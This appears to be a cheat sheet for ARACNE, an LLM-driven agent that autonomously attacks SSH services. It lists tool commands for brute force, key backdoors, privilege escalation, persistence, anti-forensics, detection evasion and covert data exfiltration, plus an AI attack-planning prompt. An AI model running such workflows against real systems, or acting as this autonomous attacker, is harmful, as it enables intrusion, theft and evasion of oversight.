
ARACNE Cheat Sheet

Overview

ARACNE (Autonomous Reconnaissance and Attack Coordination for Network Exploitation) is an LLM-based agent designed specifically to target SSH services and to autonomously explore and exploit Linux shell environments. It combines large language model reasoning with traditional penetration testing techniques to carry out sophisticated attacks against SSH-accessible systems.

⚠️ Critical Warning: Advanced autonomous exploitation tool. Use only on systems you own or have explicit written authorization to test. Unauthorized use is illegal.

Installation

Prerequisites

# System requirements
python3 --version  # Python 3.9+
pip3 --version
git --version

# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan

# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb

Installation Methods

# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect

# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v "$(pwd)/sessions:/app/sessions" aracne/aracne:latest

# Method 3: PyPI installation (if available)
pip install aracne-agent

Installation Configuration

# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs

# Initialize configuration
aracne init

# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"

# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true

Core Commands

Basic Operations

# Display help and version
aracne --help
aracne --version
aracne modules list

# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt

# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis

# System status and health
aracne status
aracne health-check
aracne modules status

Target Management

# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only

# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100

# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt

# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring

Session Management

# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise

# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose

# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise

SSH Reconnaissance and Analysis

SSH Service Discovery

# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis

# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment

# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis

SSH Vulnerability Assessment

# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick

# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs

# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks

User Enumeration

# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive

# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based

# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode

Autonomous SSH Exploitation

Credential-Based Attacks

# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing

# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning

# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware

Key-Based Attacks

# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files

# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking

# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access

Protocol-Level Exploits

# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks

# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade

Linux Shell Exploitation

Initial Access and Shell Establishment

# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key

# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal

# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys

System Reconnaissance

# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode

# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities

# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes

Privilege Escalation

# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries

# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse

# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day

Lateral Movement

# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships

# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares

# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata

AI-Powered Decision Making

Autonomous Reasoning Engine

# AI reasoning configuration
reasoning_config = {
    "model": "gpt-4",
    "temperature": 0.2,
    "max_tokens": 4000,
    "reasoning_depth": 3,
    "confidence_threshold": 0.85,
    "exploration_factor": 0.3
}

# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}

Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""

Adaptive Attack Strategies

# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority

# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information

# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition

Intelligent Command Generation

# AI-generated commands for exploration
aracne ai generate-commands --session session-123 --exploration
aracne ai generate-commands --session session-123 --privilege-escalation
aracne ai generate-commands --session session-123 --persistence

# Context-aware command selection
aracne ai select-commands --session session-123 --current-context
aracne ai select-commands --session session-123 --objective-focused
aracne ai select-commands --session session-123 --stealth-optimized

# Command effectiveness analysis
aracne ai analyze-effectiveness --session session-123 --command-history
aracne ai analyze-effectiveness --session session-123 --success-patterns
aracne ai analyze-effectiveness --session session-123 --failure-analysis

Advanced Exploitation Techniques

Stealth and Evasion

# Stealth mode operations
aracne stealth enable --session session-123 --advanced-evasion
aracne stealth timing --session session-123 --random-delays
aracne stealth obfuscation --session session-123 --command-obfuscation

# Anti-forensics techniques
aracne antiforensics enable --session session-123 --log-cleaning
aracne antiforensics timestamps --session session-123 --timestamp-manipulation
aracne antiforensics artifacts --session session-123 --artifact-removal

# Detection evasion
aracne evasion ids --session session-123 --ids-evasion
aracne evasion monitoring --session session-123 --monitoring-detection
aracne evasion behavioral --session session-123 --behavioral-mimicry

Persistence Mechanisms

# Establish persistent access
aracne persist establish --session session-123 --multiple-methods
aracne persist establish --session session-123 --stealth-persistence
aracne persist establish --session session-123 --redundant-access

# Persistence validation and testing
aracne persist validate --session session-123 --all-methods
aracne persist test --session session-123 --reconnection-test
aracne persist monitor --session session-123 --persistence-health

# Persistence cleanup and removal
aracne persist cleanup --session session-123 --selective-removal
aracne persist remove --session session-123 --complete-cleanup
aracne persist verify-removal --session session-123 --forensic-check

Data Exfiltration and Collection

# Intelligent data discovery
aracne data discover --session session-123 --sensitive-files
aracne data discover --session session-123 --database-content
aracne data discover --session session-123 --configuration-files

# Data classification and prioritization
aracne data classify --session session-123 --ai-classification
aracne data prioritize --session session-123 --business-value
aracne data assess --session session-123 --sensitivity-analysis

# Secure data exfiltration
aracne data exfiltrate --session session-123 --encrypted-channel
aracne data exfiltrate --session session-123 --steganography
aracne data exfiltrate --session session-123 --covert-channels

Monitoring and Logging

Session Monitoring

# Real-time session monitoring
aracne monitor session --session session-123 --real-time
aracne monitor activity --session session-123 --command-tracking
aracne monitor progress --session session-123 --objective-tracking

# Performance and resource monitoring
aracne monitor performance --session session-123 --resource-usage
aracne monitor network --session session-123 --traffic-analysis
aracne monitor system --session session-123 --system-impact

# Alert and notification system
aracne monitor alerts --session session-123 --critical-events
aracne monitor notifications --session session-123 --progress-updates
aracne monitor warnings --session session-123 --risk-indicators

Comprehensive Logging

# Enable detailed logging
aracne logging enable --session session-123 --comprehensive
aracne logging enable --session session-123 --ai-decisions
aracne logging enable --session session-123 --command-responses

# Log analysis and insights
aracne logging analyze --session session-123 --pattern-analysis
aracne logging analyze --session session-123 --success-factors
aracne logging analyze --session session-123 --failure-analysis

# Log export and reporting
aracne logging export --session session-123 --format json
aracne logging export --session session-123 --timeline-format
aracne logging export --session session-123 --forensic-format

Security and Ethical Considerations

Legal Authorization and Compliance

# Define authorized targets and scope
aracne scope define --target 192.168.1.100 --authorized
aracne scope define --network 192.168.1.0/24 --internal-testing
aracne scope validate --target 192.168.1.100 --legal-check

# Documentation and evidence
aracne legal document --session session-123 --authorization-proof
aracne legal evidence --session session-123 --chain-of-custody
aracne legal export --session session-123 --court-ready

# Compliance verification
aracne compliance check --session session-123 --ethical-guidelines
aracne compliance verify --session session-123 --legal-requirements
aracne compliance audit --session session-123 --comprehensive

Safety and Risk Management

# Risk assessment and management
aracne risk assess --session session-123 --comprehensive
aracne risk monitor --session session-123 --real-time
aracne risk mitigate --session session-123 --automatic

# Safety controls and limits
aracne safety enable --session session-123 --all-controls
aracne safety limits --session session-123 --time-limits
aracne safety boundaries --session session-123 --scope-enforcement

# Emergency procedures
aracne emergency stop --session session-123 --immediate
aracne emergency cleanup --session session-123 --evidence-removal
aracne emergency report --session session-123 --incident-documentation

Troubleshooting and Optimization

Performance Optimization

# Optimize AI model performance
aracne optimize ai --model-selection --performance-focused
aracne optimize ai --token-usage --cost-optimization
aracne optimize ai --response-time --latency-reduction

# Session performance optimization
aracne optimize session --session session-123 --speed-optimization
aracne optimize session --session session-123 --resource-optimization
aracne optimize session --session session-123 --stealth-optimization

# Network and connectivity optimization
aracne optimize network --session session-123 --connection-stability
aracne optimize network --session session-123 --bandwidth-optimization
aracne optimize network --session session-123 --latency-reduction

Debugging and Diagnostics

# Debug mode and verbose logging
aracne --debug session start --target 192.168.1.100
aracne --verbose ai plan-attack --target 192.168.1.100
aracne logs view --level debug --component ai-reasoning

# System diagnostics
aracne diagnose system --comprehensive
aracne diagnose ai-models --connectivity-test
aracne diagnose ssh-client --configuration-check

# Error analysis and resolution
aracne errors analyze --session session-123 --root-cause
aracne errors resolve --error-id 12345 --auto-fix
aracne errors prevent --session session-123 --predictive-analysis

Recovery and Backup

# Session recovery and restoration
aracne recover session --session-id session-123 --full-recovery
aracne recover state --session session-123 --checkpoint-restore
aracne recover connection --session session-123 --reconnect

# Backup and data protection
aracne backup create --session session-123 --incremental
aracne backup restore --backup-id backup-456 --selective
aracne backup verify --backup-id backup-456 --integrity-check

# Data integrity and validation
aracne verify integrity --session session-123 --all-data
aracne verify consistency --session session-123 --cross-validation
aracne verify authenticity --session session-123 --digital-signatures

Integration Examples

SIEM Integration

# integrations/siem_integration.py
import requests
from aracne.core.integration import BaseIntegration


class SIEMIntegration(BaseIntegration):
    """Forwards ARACNE session events to a SIEM over its HTTP API."""

    def __init__(self, siem_url, api_key):
        self.siem_url = siem_url
        self.api_key = api_key

    def send_ssh_attempt(self, attempt_data):
        # One event per SSH authentication attempt made by the agent
        event = {
            "timestamp": attempt_data.timestamp,
            "source": "aracne",
            "event_type": "ssh_attempt",
            "target": attempt_data.target,
            "username": attempt_data.username,
            "success": attempt_data.success,
            "method": attempt_data.method
        }

        return self.send_event(event)

    def send_privilege_escalation(self, privesc_data):
        # One event per privilege escalation attempt and its outcome
        event = {
            "timestamp": privesc_data.timestamp,
            "source": "aracne",
            "event_type": "privilege_escalation",
            "target": privesc_data.target,
            "technique": privesc_data.technique,
            "success": privesc_data.success,
            "privileges_gained": privesc_data.privileges
        }

        return self.send_event(event)

    def send_event(self, event):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        # Time out instead of blocking the session on an unresponsive SIEM
        response = requests.post(
            f"{self.siem_url}/api/events",
            headers=headers,
            json=event,
            timeout=10
        )

        # True only when the SIEM accepted the event
        return response.status_code == 200

Threat Intelligence Integration

# integrations/threat_intel.py
from urllib.parse import quote

import requests
from aracne.core.threat_intel import ThreatIntelProvider


class ThreatIntelIntegration(ThreatIntelProvider):
    """Queries a threat intelligence API for SSH vulnerability data."""

    def __init__(self, api_key):
        self.api_key = api_key
        self.base_url = "https://api.threatintel.com"

    def get_ssh_vulnerabilities(self, ssh_version):
        headers = {"Authorization": f"Bearer {self.api_key}"}

        # Percent-encode the version string so it cannot alter the URL path
        response = requests.get(
            f"{self.base_url}/vulnerabilities/ssh/{quote(ssh_version, safe='')}",
            headers=headers,
            timeout=10
        )

        if response.status_code == 200:
            return response.json()
        return []

    def get_exploit_techniques(self, target_os, target_version):
        headers = {"Authorization": f"Bearer {self.api_key}"}

        response = requests.get(
            f"{self.base_url}/techniques/"
            f"{quote(target_os, safe='')}/{quote(target_version, safe='')}",
            headers=headers,
            timeout=10
        )

        if response.status_code == 200:
            return response.json()
        return []

    def report_new_technique(self, technique_data):
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json"
        }

        response = requests.post(
            f"{self.base_url}/techniques/report",
            headers=headers,
            json=technique_data,
            timeout=10
        )

        # 201 Created means the report was stored
        return response.status_code == 201

Best Practices

SSH Exploitation Best Practices

# Reconnaissance before exploitation
aracne recon comprehensive --target 192.168.1.100 --pre-exploitation
aracne analyze target --target 192.168.1.100 --vulnerability-assessment
aracne plan attack --target 192.168.1.100 --risk-assessment

# Gradual escalation approach
aracne attack gentle --target 192.168.1.100 --low-impact
aracne attack moderate --target 192.168.1.100 --measured-approach
aracne attack aggressive --target 192.168.1.100 --high-confidence

# Stealth and operational security
aracne stealth maximum --session session-123 --anti-detection
aracne opsec enable --session session-123 --comprehensive
aracne evasion advanced --session session-123 --adaptive

AI Model Optimization

# Model selection and tuning
aracne ai optimize --model-selection --task-specific
aracne ai tune --parameters --performance-focused
aracne ai calibrate --confidence-thresholds --accuracy-focused

# Prompt engineering and optimization
aracne ai optimize-prompts --task ssh-exploitation
aracne ai optimize-prompts --task privilege-escalation
aracne ai optimize-prompts --task lateral-movement

# Continuous learning and improvement
aracne ai learn --from-sessions --pattern-recognition
aracne ai update --knowledge-base --latest-techniques
aracne ai validate --accuracy --benchmark-testing

# Session management best practices
aracne session plan --target 192.168.1.100 --comprehensive-planning
aracne session execute --plan session-plan --monitored-execution
aracne session review --session session-123 --lessons-learned

# Documentation and reporting
aracne document session --session session-123 --comprehensive
aracne report generate --session session-123 --technical-details
aracne evidence collect --session session-123 --forensic-quality

# Quality assurance and validation
aracne validate findings --session session-123 --cross-verification
aracne verify exploits --session session-123 --proof-of-concept
aracne assess impact --session session-123 --business-context

https://aracne.readthedocs.io/
https://aracne.readthedocs.io/ssh/
https://aracne.readthedocs.io/ai/
https://arxiv.org/search/?query=aracne+ssh
https://arxiv.org/search/?query=llm+exploitation